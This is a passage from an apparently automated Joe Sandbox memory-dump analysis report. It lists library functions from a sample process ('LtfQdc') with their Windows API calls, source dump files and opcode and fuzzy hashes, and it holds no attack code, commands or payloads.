0x00cbf4bc
0x00000000
0x00cbf4ac
0x00cbf40f
0x00cbf378
0x00cbf37c
0x00cbf380
0x00cbf384
0x00cbf387
0x00cbf38b
0x00cbf38f
0x00cbf392
0x00000000
0x00000000
0x00000000
0x00cbf392
0x00cbf298
0x00cbf2a0
0x00cbf2a6
0x00cbf2a9
0x00cbf2bc
0x00cbf2bf
0x00cbf2c1
0x00cbf2c3
0x00cbf2c9
0x00cbf2c9
0x00cbf2cc
0x00cbf2ce
0x00cbf2d1
0x00cbf2d1
0x00cbf2ab
0x00cbf2ae
0x00cbf2b1
0x00cbf2b1
0x00cbf2d6
0x00cbf2db
0x00cbf321
0x00cbf321
0x00000000
0x00cbf321
0x00cbf2e1
0x00cbf2e4
0x00cbf300
0x00cbf300
0x00cbf304
0x00000000
0x00000000
0x00cbf306
0x00cbf30b
0x00cbf2f7
0x00cbf2fa
0x00cbf4c0
0x00cbf4c2
0x00000000
0x00cbf4c2
0x00000000
0x00cbf2fa
0x00cbf310
0x00cbf2f0
0x00cbf2f0
0x00cbf312
0x00cbf314
0x00cbf31a
0x00cbf31c
0x00cbf31c
0x00cbf314
0x00cbf2f5
0x00000000
0x00000000
0x00000000
0x00000000
0x00cbf2f5
0x00000000

APIs

__floor_pentium4.LIBCMT ref: 00CBF3A5
__floor_pentium4.LIBCMT ref: 00CBF442

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 0e1e597cec7cbd3ad736a076cc3555fcd674f32638b4db70ed8c30edf8e20bf6
Instruction ID: 78932135648b95ccf4a488df7671dd5ae32936f6f679af337810eae12cc6e495
Opcode Fuzzy Hash: 0e1e597cec7cbd3ad736a076cc3555fcd674f32638b4db70ed8c30edf8e20bf6
Instruction Fuzzy Hash: F0A1D472B006158FCB15CE69CC802AEB7B3AFD5310B29C66DD815EB314E731ED828B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CEE37C Relevance: 2.1, APIs: 1, Instructions: 557COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00CEE49F

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: b69bc7f2cf21e56fb9ab40f4705383752af76f7c7c96afb50c93ed906ea2cb07
Instruction ID: f2bc2a377bfed2250801b8214524b2b0e59f434c61cb23a978738c4554de30aa
Opcode Fuzzy Hash: b69bc7f2cf21e56fb9ab40f4705383752af76f7c7c96afb50c93ed906ea2cb07
Instruction Fuzzy Hash: C312F3726043889FC724EF65C981AEFB7E5FF99350F00091DFA9997241DB30AA05DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C9A3AC Relevance: 1.9, Strings: 1, Instructions: 613COMMON

Download Yara Rule

Strings

__next_prime overflow, xrefs: 00C9AB25

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID: __next_prime overflow
API String ID: 0-822664188
Opcode ID: cad46569aecfde3f6f3871b3cb716bca0bd5d47099a8d016fea5004b734fe92f
Instruction ID: e3835812cf76653ec41eb1321a173ad6f570078a4405e1ed2d022d718de90a1a
Opcode Fuzzy Hash: cad46569aecfde3f6f3871b3cb716bca0bd5d47099a8d016fea5004b734fe92f
Instruction Fuzzy Hash: 1702A135B012228FCF5DCD29CCDD16DB393AB94340B28847ADC1AD7221D325ED5AC6E6

Uniqueness

Uniqueness Score: -1.00%

Function 00D1F347 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00CBCEA8), ref: 00D1F574

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 1e81f2846aafb0ecef3e20b4459172fca535553364b0ae37dc565916f5450dc8
Instruction ID: b13d76a73fc0f1f3710d47f0cc05d09e103f93735fc669b47220538ec92a5a70
Opcode Fuzzy Hash: 1e81f2846aafb0ecef3e20b4459172fca535553364b0ae37dc565916f5450dc8
Instruction Fuzzy Hash: EEB16031210605EFD714CF28D486BA57BE1FF45364F298668E8DACF2A1CB35E981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CFE406 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CFE41C

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: cfde29c45344ac2b2259904a9b3404060d79d64af751a5b55dfb4e95d447abd6
Instruction ID: e19d290f5cf952787adb1fc32033ebaa77f7b536162c6f6c77c67da575586be2
Opcode Fuzzy Hash: cfde29c45344ac2b2259904a9b3404060d79d64af751a5b55dfb4e95d447abd6
Instruction Fuzzy Hash: 68519EB19013098BDB68CF99D8817AABBF1FB49314F24847AD615EB360E374DA44CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00D1A7F0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00D155BA: GetLastError.KERNEL32(?,00000008,00D12B3A), ref: 00D155BE
Part of subcall function 00D155BA: SetLastError.KERNEL32(00000000,?), ref: 00D15660

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D1A844

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: b1c07c2e4aa91be5b1277748ca5a4b121766d61000c392cbb24065f7c2a1dd5a
Instruction ID: d1d6c8371b1dcac15e4c92821c100898b2a27da9aeac15e1061aa9c59e6608d1
Opcode Fuzzy Hash: b1c07c2e4aa91be5b1277748ca5a4b121766d61000c392cbb24065f7c2a1dd5a
Instruction Fuzzy Hash: 0E218332616206BBEF289E19EC41AFA77A9EF44310F14007AFD01C6141EF74DD819771

Uniqueness

Uniqueness Score: -1.00%

Function 00D1A493 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00D155BA: GetLastError.KERNEL32(?,00000008,00D12B3A), ref: 00D155BE
Part of subcall function 00D155BA: SetLastError.KERNEL32(00000000,?), ref: 00D15660

EnumSystemLocalesW.KERNEL32(00D1A530,00000001,00000000,?,-00000050,?,00D1A31D,00000000,-00000002,00000000,?,00000055,?), ref: 00D1A505

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: eecaad88fd19f911fd2ff356cb8584f5c51ba9640c64387fa60d2ed340949039
Instruction ID: 3e8a8add69b501ce02243725ca4ffa9ab0088948cd586530474d797fcfa50ebd
Opcode Fuzzy Hash: eecaad88fd19f911fd2ff356cb8584f5c51ba9640c64387fa60d2ed340949039
Instruction Fuzzy Hash: 1E112C37204701AFDB189F3DE8955BA7792FF80364B18442DE98B87740DB71A983C750

Uniqueness

Uniqueness Score: -1.00%

Function 00D1A910 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00D155BA: GetLastError.KERNEL32(?,00000008,00D12B3A), ref: 00D155BE
Part of subcall function 00D155BA: SetLastError.KERNEL32(00000000,?), ref: 00D15660

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D1A964

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 5cfd9b426ef262e83724824e8532513090352efd678e00774ecf66e1d300c453
Instruction ID: 502bedfb2ae21c50fdb66eeb6465352d8b0dd61c00b9657965f6eff936e0667e
Opcode Fuzzy Hash: 5cfd9b426ef262e83724824e8532513090352efd678e00774ecf66e1d300c453
Instruction Fuzzy Hash: E911C672501206BBDB14AF28EC46AFA77E9EF44310B14407AF501D7241EF78ED819BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00C9565E Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00C956A5

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 09393f9cc56b88c1606fd9f5613c5a430bdff82ef086a93fccd0e12423821a9e
Instruction ID: 290f60b9cffc158c1a41892c382f327b8d146da6ba2cfa9b5c1e66aacc5123df
Opcode Fuzzy Hash: 09393f9cc56b88c1606fd9f5613c5a430bdff82ef086a93fccd0e12423821a9e
Instruction Fuzzy Hash: 472195B2D10B858AD320CF24C940AA3B7E4FFDD710F104B1EE9EA86742DBB4A540C780

Uniqueness

Uniqueness Score: -1.00%

Function 00D1AABD Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00D155BA: GetLastError.KERNEL32(?,00000008,00D12B3A), ref: 00D155BE
Part of subcall function 00D155BA: SetLastError.KERNEL32(00000000,?), ref: 00D15660

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00D1A74C,00000000,00000000,?), ref: 00D1AAE9

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: ce4d085ace2e750de772f1e1ba5b71d5e1c9d8789df6e999e27cf77f1f0d7323
Instruction ID: 742d9b17c273bac070da5950e5a238d712743fe6dd5fa31f4acb3bd8a6e33f39
Opcode Fuzzy Hash: ce4d085ace2e750de772f1e1ba5b71d5e1c9d8789df6e999e27cf77f1f0d7323
Instruction Fuzzy Hash: 56F0F932905151BBDB245A68E905BFB7766EB40364F080426EC16A3180EE78FD81C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00D1A783 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00D155BA: GetLastError.KERNEL32(?,00000008,00D12B3A), ref: 00D155BE
Part of subcall function 00D155BA: SetLastError.KERNEL32(00000000,?), ref: 00D15660

EnumSystemLocalesW.KERNEL32(00D1A7F0,00000001,?,?,-00000050,?,00D1A2E1,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00D1A7CD

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 210dd5a33a41c9ba9fa3c1f6ddbb2e99a1246c58e71b8f902247c14630f9cb63
Instruction ID: 352573a5e3abf4f26170f6b872c3929d90370518408137c8b243731e1ebaf898
Opcode Fuzzy Hash: 210dd5a33a41c9ba9fa3c1f6ddbb2e99a1246c58e71b8f902247c14630f9cb63
Instruction Fuzzy Hash: E6F0FC362013047FDB155F3DF881ABA7BA2EF80768B09442DF945476D1DAB19E86C670

Uniqueness

Uniqueness Score: -1.00%

Function 00D164CD Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00D165D1: EnterCriticalSection.KERNEL32(?,?,00D12BEA,?,00D3F228,0000000C), ref: 00D165E0

EnumSystemLocalesW.KERNEL32(00D164C0,00000001,00D3F410,0000000C,00D15D81,-00000050), ref: 00D16505

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 903b80882699dc9872eb1f0849f8eb970964f9cad21fe0e1c4750c111ee709b1
Instruction ID: 775d94791c8f45ce5f3ef7fbcf1d9e757ae180c13b260e5d0fd86703d1297476
Opcode Fuzzy Hash: 903b80882699dc9872eb1f0849f8eb970964f9cad21fe0e1c4750c111ee709b1
Instruction Fuzzy Hash: 20F0377AA00204AFDB00EF98E842B9D7BF1FB05725F00422AF510DB3A0DB7589448F60

Uniqueness

Uniqueness Score: -1.00%

Function 00D1A8C5 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00D155BA: GetLastError.KERNEL32(?,00000008,00D12B3A), ref: 00D155BE
Part of subcall function 00D155BA: SetLastError.KERNEL32(00000000,?), ref: 00D15660

EnumSystemLocalesW.KERNEL32(00D1A910,00000001,?,?,?,00D1A33F,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00D1A8FC

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: fabfb0554f259a31645dd77da7779dd8d81c40a01aa387936caaae1a25a8b1e1
Instruction ID: 80dd4d3147e10ea5b125ec65d844f743e869039b9ec4e15bf9a3c75ed10a3d18
Opcode Fuzzy Hash: fabfb0554f259a31645dd77da7779dd8d81c40a01aa387936caaae1a25a8b1e1
Instruction Fuzzy Hash: CCF0E53A30020567CB049F39E8596BA7F95EFC1761B4B4059EA058B650CA7599C7CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CECAE4 Relevance: .7, Instructions: 734COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 330603800cbe0bc1ace25704b440ce4793091bbd87bc93fbcb48eb88c6c600d7
Instruction ID: 47416d118dc42e0398dd627b4e9a20a39aa92922ed4bbe94c22e21117fa9d61a
Opcode Fuzzy Hash: 330603800cbe0bc1ace25704b440ce4793091bbd87bc93fbcb48eb88c6c600d7
Instruction Fuzzy Hash: 41522976A087459FC704CF29C89065ABBE2FFC8354F198A2DF999973A0D734D905CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00C85A80 Relevance: .6, Instructions: 598COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d6c9128871f1856d39bcc1edb13b036d26e4810c246a284f6b4713b95345826
Instruction ID: 72c0535dcc4b04ff6b7b6f89731ff9e7f1a437c1f4914e8f8e1259a7486bdbb7
Opcode Fuzzy Hash: 4d6c9128871f1856d39bcc1edb13b036d26e4810c246a284f6b4713b95345826
Instruction Fuzzy Hash: 9A2273735417044BE318CE2ECC815C2B3E3AFD822475F857EC926CB796EEB9A6174548

Uniqueness

Uniqueness Score: -1.00%

Function 00C84A80 Relevance: .5, Instructions: 483COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
